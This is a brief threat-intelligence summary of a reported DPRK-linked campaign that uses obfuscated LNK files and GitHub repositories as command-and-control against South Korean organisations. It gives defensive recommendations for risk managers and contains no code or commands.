DPRK‑Linked Hackers Exploit GitHub as C2 in Multi‑Stage LNK Attacks Targeting South Korean Organizations
What Happened — Fortinet’s FortiGuard Labs identified a nation‑state threat group linked to the Democratic People’s Republic of Korea using GitHub repositories as command‑and‑control (C2) servers. The campaign begins with obfuscated Windows shortcut (LNK) files that drop a decoy PDF and subsequently pull malicious payloads from the compromised GitHub pages.
Why It Matters for TPRM —
- Public code‑hosting platforms can be weaponised, turning a trusted service into a covert C2 channel.
- Multi‑stage attacks bypass traditional perimeter defenses, increasing the risk of data exfiltration or ransomware.
- Organizations that rely on third‑party SaaS or cloud‑based development tools may inadvertently expose themselves to the same vector.
Who Is Affected — South Korean enterprises across technology, finance, manufacturing, and government sectors that accept external files or interact with public repositories.
Recommended Actions —
- Review and tighten inbound traffic inspection for GitHub and other public code‑hosting domains.
- Deploy LNK‑file sandboxing and block execution of unsigned shortcuts.
- Enforce strict URL filtering and threat‑intel‑driven IOC blocking for known malicious GitHub repositories.
- Conduct a supply‑chain risk assessment of any third‑party tools that pull code from public repositories.
Technical Notes — The initial LNK file is heavily obfuscated to evade static analysis and drops a benign‑looking PDF to gain user trust. Once executed, the shortcut runs a PowerShell script that clones a malicious GitHub repo, retrieves additional binaries, and establishes a persistent back‑door. No specific CVE is cited; the attack leverages legitimate GitHub functionality rather than a software flaw. Source: The Hacker News